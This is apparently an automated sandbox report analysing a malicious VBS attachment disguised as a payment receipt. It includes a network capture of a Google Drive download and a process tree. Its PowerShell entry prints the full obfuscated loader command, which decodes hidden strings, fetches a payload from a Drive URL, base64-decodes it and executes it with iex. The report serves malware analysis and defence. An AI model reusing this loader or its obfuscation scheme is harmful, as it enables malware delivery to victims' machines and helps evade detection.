                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                              Server: ESF
                              Content-Length: 0
                              X-XSS-Protection: 0
                              X-Frame-Options: SAMEORIGIN
                              X-Content-Type-Options: nosniff
                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                              Connection: close


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              1 | 192.168.2.10 | 49706 | 142.251.2.132 | 443 | 7420 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              Timestamp | Bytes transferred | Direction | Data
                              2024-04-24 05:01:25 UTC | 233 | OUT | GET /download?id=1p8CA5IWVRgggeGBH5Jt5SA7bzDiwA7De&export=download HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                              Host: drive.usercontent.google.com
                              Connection: Keep-Alive
                              2024-04-24 05:01:27 UTC | 2121 | IN | HTTP/1.1 200 OK
                              X-GUploader-UploadID: ABPtcPq3nDtyzK8q6By3y66PYy58FQ4HTml1sikjes70AE8FNHkXLn5CQiVlpFPTdeWeF8QK6P4
                              Content-Type: text/html; charset=utf-8
                              Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site
                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                              Pragma: no-cache
                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                              Date: Wed, 24 Apr 2024 05:01:27 GMT
                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                              Cross-Origin-Resource-Policy: same-site
                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                              Content-Security-Policy: script-src 'nonce-lix8fzAPduPs5V3_g64qyw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                              Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                              Cross-Origin-Opener-Policy: same-origin
                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                              reporting-endpoints: default="/_/DriveUntrustedContentHttp/web-reports?context=eJzj0tDikmII1JBisN47ndUeiJ3SZ7CGAPHqn-dY1wPx4rDzrCuAWIiHY_mSRRvZBD7sntPHCAAJbBUf"
                              Content-Length: 1692
                              Server: UploadServer
                              Set-Cookie: NID=513=RqtV41bQGyYBuQ36ONaOCKID3W_iM6tleogqBZ-Rzvftbvpqut0JJKfVXgGoE9MRBuH1t1edBa_oPQWrL8GTPK4K1Fu7lRSauytjEaJLY7uXSXPN9hoQ0QYX-PX3KJ9kiRef94wI6jvVckZndiP-tHU681QOB1eWwH6xqVdG9r0; expires=Thu, 24-Oct-2024 05:01:26 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                              Content-Security-Policy: sandbox allow-scripts
                              Connection: close
                              2024-04-24 05:01:27 UTC | 1692 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 47 6f 6f 67 6c 65 20 44 72 69 76 65 20 2d 20 49 6e 66 65 63 74 65 64 20 66 69 6c 65 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4d 45 46 71 65 79 4a 55 64 71 52 4c 49 62 42 4e 2d 49 71 50 73 77 22 3e 2e 67 6f 6f 67 2d 6c 69 6e 6b 2d 62 75 74 74 6f 6e 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6f 6c 6f 72 3a 23 31 35 63 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 75 72 73 6f 72
                              Data Ascii: <!DOCTYPE html><html><head><title>Google Drive - Infected file</title><meta http-equiv="content-type" content="text/html; charset=utf-8"/><style nonce="MEFqeyJUdqRLIbBN-IqPsw">.goog-link-button{position:relative;color:#15c;text-decoration:underline;cursor



                              Target ID:0
                              Start time:07:01:20
                              Start date:24/04/2024
                              Path:C:\Windows\System32\wscript.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\JUSTIFICANTE DE PAGO.vbs"
                              Imagebase:0x7ff753bf0000
                              File size:170'496 bytes
                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:2
                              Start time:07:01:20
                              Start date:24/04/2024
                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Karyokinesis104 = 1;$Unrefracting='Substrin';$Unrefracting+='g';Function Agonothet($Haandgribelige){$Judiciousness=$Haandgribelige.Length-$Karyokinesis104;For($organoleptically=5; $organoleptically -lt $Judiciousness; $organoleptically+=(6)){$Bundlses+=$Haandgribelige.$Unrefracting.Invoke($organoleptically, $Karyokinesis104);}$Bundlses;}function popess($Rdstjerternes){& ($Speecher) ($Rdstjerternes);}$Stentrykkerierne=Agonothet 'SuspiMStaccoUnvigzOverli ,ntolQuainl degeaPaste/Arabi5Strat.In.er0V,cci Petit(mo,igW Und,iD armn C brdRadiooStraawPharys.yldi tilstNAfhjeTCanad Skov1S,edi0 Min..H nds0 Pant;Svend Ne.paWbivaliPaveknPosts6Se,ip4Poro.;Plebi ConatxHuele6 Gras4Servi;Sonny ,ivvarGeckovShipp: Dans1 ulmu2runen1 Pro .br.sn0 Fina)Se vt Unde GForsteDesincHansgkBelonoForh./Epose2atmoc0nedve1Float0Missi0Vigne1Harce0 Gang1Pte o .egynFEndl iKonverPanereKruspf X.loo DistxAbdu./Klass1 Fr.m2Chink1Auten.L.del0Rulle ';$Untestable27=Agonothet ' PolyUTarogs,onheeJobs r,okse-Ted iA OlymgUnhaneSagitnMattetDanse ';$Mblements=Agonothet 'BefryhUn ertGr.fit TagspPul,os.jtad:Macro/T,edo/ Na.udBascurShippiChangvAuxineBegrn. 
A isgprimeoLovbeo T rng StralGoogoeD fer.EvighcSusp,oFr semDeg,a/AgftauLea hcTppeb?.asimeFlavoxTautop Tremo Natur,irketAgerk=Piet.dVindioSpisewDespinPaakllFishsoEl,esaMo.aidHiela&outgli .lgedRusti=Seign1 udstp Quen8 OverCafblaAKa hi5i.terIShawiWSkovrVAfparRS.icigIntragArrhigRtenjeDemarGLeptoBJo,glHbolst5 S.rjJTillgtGens.5 TermSParosAOvern7Tingeb .kstzStilpDDk,eniAscesw fo.wAColu.7 LazaDFemgreWaggo ';$Gashes=Agonothet 'Vekse> Tlle ';$Speecher=Agonothet 'Gl.cyiTr.nseEkspoxS,ibs ';$Hjemgivelsen='Drfyldingen';popess (Agonothet 'Sam.uSRetateO,pebtDucti-KangaC Li soGrundnEnsomtOzon.eStratnIleitt Dank p.ri-BesaaP Kan.aPrefat Alfah Tora KismTDrmm.:Halm \ UlleC Ghosl Whalu Le.nsDomnetRewineAccesr,necdyLands.fejlutNonauxCamayt.unkt Ubud -BinapVOvermaAkti.l billuUnparePr.in Rubri$JackaHInaprjJer.beAstr,mScenag RolliBand.vRecule AnnalZani.sKobbeeKont,n,ncom; Nonw ');popess (Agonothet 'BrugeiBassefarbej Tour(RestptG auceAnt ssSwerdtRela.-gondopTailgaKontotUsitah Hnge BifokTAksle:Fanci\KnickCFodtulRevoluOr.ogs Af.ot,npreeYngstrV venyBitte.RovdytSalamxOmnortBores)Behan{ Ek.eeChillxTele,i .trut Unl,} Slu ;L,vsf ');$Julegavens = Agonothet ' Bek eSheracUnwirhvr.stoBehnd Unmuz%anke,aOrigepBagr.p .ndhdGy,noaPer itPerspaKomed% fixu\TocorTB,boer ForhaHaroln BrungHan,lsGyptet,arkfiMictul PseufMilielVapordManteeMessi. LophPCerbeeTabacrSam.m Sigh,& F.br&Socio len.ie,oritcJagtsh.oraloInfan Sala$Nigri ';popess (Agonothet 'M,lkm$StatsgErhvel CrunoSpickbWheezaIchull H rd:SolioC,estuo ExosnPromisDonnatGenbra Tsa,n ejfntPlateiRandba shas Unh,=Indig(Skdebc RancmFrontdGenma .irc/ DeklcPres. 
Negle$ElverJHavaruForsrl,mbereR.eumginva,aZendovSpi.ieratepnHelfls F rt)G ucu ');popess (Agonothet 'ju,ef$Dob,egAnt.gl SiesoinddabThalaaOmforlMica.:DrageSVand.lNaturiHer enMontetDesmoesalatrTofro4Bo dg8u,sea=Vic.u$Ge erMUnciabDrvtylDon ee PutnmGlyc ePlat nskovttamalgsopvel.rabb.sAnacep Bltel .ouni.loritSpand(Nstfo$FiskeGBard,aPajamsTuetuhAl,ereCiselsHyp r)Immun ');$Mblements=$Slinter48[0];popess (Agonothet ' seam$Hel.cgArbejlPolygoStadfb Bulea mil ludska: St tREro,ru MatrbGrailrPiot,iExtercHalimeBy.gersti.ueCompasDeafe1Ethan0Almsd7Linea= Ud,tNMineseUd,ikwDeute-K.ystOMarkibEks mjMillieMondncUndelt.rapp BivirSSkizoymuntrs GingtPi.seeDampemArta,.Z nneNSovekeKatystBehag.LimbeWDecaseBillyb obulC.rilal PalaiPjecee,oresnMelletPenna ');popess (Agonothet 'Over.$ YounR RaceuS.ralb lectrFamiliMask.cDi feeHu rarNondeeAxhamsg,bbe1 reol0 Snub7Kri.e.Afr,dHBand.eAktivaMyotod Afkae c tarHegnssValgk[Fa le$Ere.tUEasygn billthasteeOmdebsPalertVisu a ZonkbDockilRo.eseStr,a2Hjeml7 Hjlp]Mi.la=Godsv$MicroSSte.st NudleBestrnHercutNons,r Ba.oyIm.otkGarruk FolkeMaillrIndreiSynale outdrCykeln un eeSuper ');$celandines=Agonothet 'Nbfl.RRa.bruTrst,bOtorrrYpperi,abatcFlommenamnarBranceScreesLindy1.edev0Un.er7Bolon. 
Eta.D Co loChariwTaarnnSoleml ScanoEks ea TreddS.ambF rudeimo,talKadeneMesat(,earf$GaardMBrystbClumplN,biaeGatt mLrepleFittinP,eintCordesUns,o,wi.es$ KompIProt,sBllebdP rickAfs ukPinnieRetab4Efter7 Dec,)Peace ';$celandines=$Constantias[1]+$celandines;$Isdkke47=$Constantias[0];popess (Agonothet 'Konvo$D sksg .arml ChamoSpdb bForekaOver lDipht:Cit,zhSuffeyForkrdListerVoryso ndymcSpageoTeserrAmantaDab,ilSu.ab=Forem(TraveTMalmieDuknasChlortTo,tu-niobePHa,ndaFejlmt Floth Zadr Men,o$GardeI NivesEpis,dTilbjkRembuk Forge cond4 .jib7Ri.ou)Flirt ');while (!$hydrocoral) {popess (Agonothet 'Drags$ La.egFlo hlLandsoVelgrbPoloeaPremalProgr:me,akDAfregiGirenfHairnfV.jnieKalkurTrstieAfpilnDi hocSuetsiF.actnLan vgGrf.e=Infor$MorgetFakturT ldfuO.stneyderk ') ;popess $celandines;popess (Agonothet 'ApertS Biomt Fonda ObserAnstrtBu.fo-SearcSSa,tal ExpoeU,skyePneu,pCra l Twib4Scute ');popess (Agonothet 'H lpe$ ForsgTaknelZosteo Brugbsvvefa Ge.mlModst:K.wieh prrsy,umildBravurGenudoFeriecZapuso Strur RuskaBloddl Int,=Smaln(LamelTDichoeHa mosQu.nntTin,f-Snup,P,aaseaDisp,tJudash Blan ryg v$Tax eIPiscasKli,kdEcheskNetkokT,aere Canz4 aund7t.ene).ngou ') ;popess (Agonothet 'Disda$ PrergScenalTouchoTra sbD finaSprinlHist :ReproSBiomat Vetco PistwAfbrnwRundtoVeeenoOrthodMythi3Unifo0Kines=Levem$Beva,gDiscelSekito.avfobTe.miarevlelUdben:ReskoSF,ltstR hearNe atgDa,legJurisaraketr UdvinSvarrs .ndesRu.katPlneroRutinf DopifProloeBlomsrAbands.tnkn+Moboc+Apoci%Delta$ EsopS.mitslAlvori UnrenBisamt fvaneu,sacrFarv 4folke8El en.Liberc upero ilduH akpnSteept Anse ') ;$Mblements=$Slinter48[$Stowwood30];}popess (Agonothet 'Tayr $ArmbagQueenlAllezo.mstnbkongsa FremlA.sik:Lege.DLo beo BienmEksameHjulssNden,tTap,oiFennekKohovv,afferEco yeT rjel AndesSilkseSatisr,hilosBaksn Man,a=Sark. 
Vans GNed,ieAfkastgysen-AiramC B.droCapsinAdiabt KompeSprinn.isfutBolig Phary$ O.onIAlkohsPlombdSenteklimpikKongeeSise.4homon7Bel.c ');popess (Agonothet 'Para,$Deemig Fllel sseoMulslb El,eam anelPs,lm:AgituTgang.eKastrn PhenaNo,prkAffi,tMnstraAmbitk Fste In.er=frekv Fisk[LnsomS Stasy,onvisGlaivt SouveGlaismRudsk. TmthCIsopyo Gl.tnUnprov .jlle Entrrdet ctMedit]Dagos:Endag:DecliFPermirStoppo GenemBelgiBJunipaRe.nfsKl.ppeFrtid6Cornc4Sp,roSAfndetTal.trAcrosiG.oedn MetagNarko(Trfor$ PseuDRailloWhi,emKeybde CystsTreattUnem iC pitk Funkv.idgerm.noseprvebl Venns Unsee uro rsvimls H.lt)Helio ');popess (Agonothet 'Bruse$magt gWag ilAvnedopupilbSaltaaBatiklSlukn: Mo,iR Legga Petrt esole s,ndpE.staeArenanAjoursUnderiStango ShronBlokm Sigil=Teend Skils[CheneSSjipnyO togs vernt ruffeBrnepmSluts.Re,ssTTriloeCa,woxPureetArg.n. ChicE Inten.etshcBu,fpoBr.eod PubliAssonnMis.cgstarn]Tuill:Sulp : poseA HennS AposC RsonI.versIK rsu.kommaGWusppeTi.stt HypeSS ifttLepidrHumifi ,otrnEk.prg,amme(Ba,lo$BourtTFalsieGainsnFrav,aG.dfokOp,evt rmpa.ommekDysan)Bygni ');popess (Agonothet 'Alant$FladbgthramlFolkeo Livsb P.roaMe.halFiske:M,lleMShawwePreinnDecenu,njuraProfilTarint Sti el,ehmrPres nKildeaDelbet R.fli BlatvOverie nudirB usksUn.az9.ntra3Janap=Termo$ FileRCh.mpaPrecitBagste CapipHuehueTillgnDrmmes Nedkisph.gohu,tlnDilet.Syda.s Te,suHaa dbTrilos Sinst Syslr jentiVandsnflunkgCo vi( am,e3serig0 Kom,4Stjer6Jeep,8Dueur3Outsp,Steni2Cysti7 Argu6Tetan4Psych8Nitro)Lubri ');popess $Menualternativers93;"
                              Imagebase:0x7ff7b2bb0000
                              File size:452'608 bytes
                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:3
                              Start time:07:01:21
                              Start date:24/04/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff620390000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:4
                              Start time:07:01:23
                              Start date:24/04/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Trangstilflde.Per && echo $"
                              Imagebase:0x7ff7f6210000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                                Memory Dump Source
                                • Source File: 00000002.00000002.1396368118.00007FF7C1A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1A10000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_7ff7c1a10000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ab60fb930100ed7d962e6be0e7a223b133d597454d7ea734177f4b3265178e12
                                • Instruction ID: f3562b6b1699ff3cff5d1350af446e58da33e450281747c512c0ab0747e339ee
                                • Opcode Fuzzy Hash: ab60fb930100ed7d962e6be0e7a223b133d597454d7ea734177f4b3265178e12
                                • Instruction Fuzzy Hash: 13C16831A0DA898FEB55EF2C9854AB9BB91FF46360B6501FFD04EC71D3DA18A805C351
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000002.00000002.1395935885.00007FF7C1940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_7ff7c1940000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                • Instruction ID: 6cd3c5b42bc9be403b0dc36aeda2a319b99b9ae89d08a99cb370ce7d90ff603a
                                • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                • Instruction Fuzzy Hash: D401677111CB0C8FD748EF0CE451AA5B7E0FB95364F50056EE58AC3651D636E981CB45
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1395935885.00007FF7C1940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_7ff7c1940000_powershell.jbxd
                                Similarity
                                • API ID:
                                • String ID: L_^$L_^$L_^$L_^$L_^
                                • API String ID: 0-2264858084
                                • Opcode ID: 62a8cbaf36892077b8121e27e1085869ccb284688da18f8b56a1d05003f1fb7c
                                • Instruction ID: 643a37b6690e8454e3c35eb809c34ff5491998744d0ae40f98869d2e34c925fa
                                • Opcode Fuzzy Hash: 62a8cbaf36892077b8121e27e1085869ccb284688da18f8b56a1d05003f1fb7c
                                • Instruction Fuzzy Hash: 8C41A4A790D7C24FD3036B2918641D5BF61EF5327879911F7C1D54B293ED68280B8362
                                Uniqueness

                                Uniqueness Score: -1.00%